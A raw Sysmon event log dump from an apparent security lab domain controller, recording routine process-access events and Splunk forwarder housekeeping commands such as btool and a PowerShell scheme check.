13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007450Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85EC-5FCF-3901-000000009101}4576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007449Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.197{10ACEC4A-85EA-5FCF-2C01-000000009101}41404276C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-85EC-5FCF-3901-000000009101}4576C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007448Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.204{10ACEC4A-85EC-5FCF-3901-000000009101}4576C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85EA-5FCF-2C01-000000009101}4140C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000007447Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:56.166{10ACEC4A-85EB-5FCF-3801-000000009101}41202460C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4701-000000009101}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007639Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007638Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007637Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007636Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007635Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007634Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007633Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-85ED-5FCF-4701-000000009101}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007632Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.712{10ACEC4A-85E9-5FCF-1B01-000000009101}18404240C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-85ED-5FCF-4701-000000009101}4076C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007631Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.714{10ACEC4A-85ED-5FCF-4701-000000009101}4076C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-85E9-5FCF-1B01-000000009101}1840C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007630Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-85E9-5FCF-1F01-000000009101}31363920C:\Windows\system32\conhost.exe{10ACEC4A-85ED-5FCF-4601-000000009101}5020C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007629Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007628Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:55:57.603{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 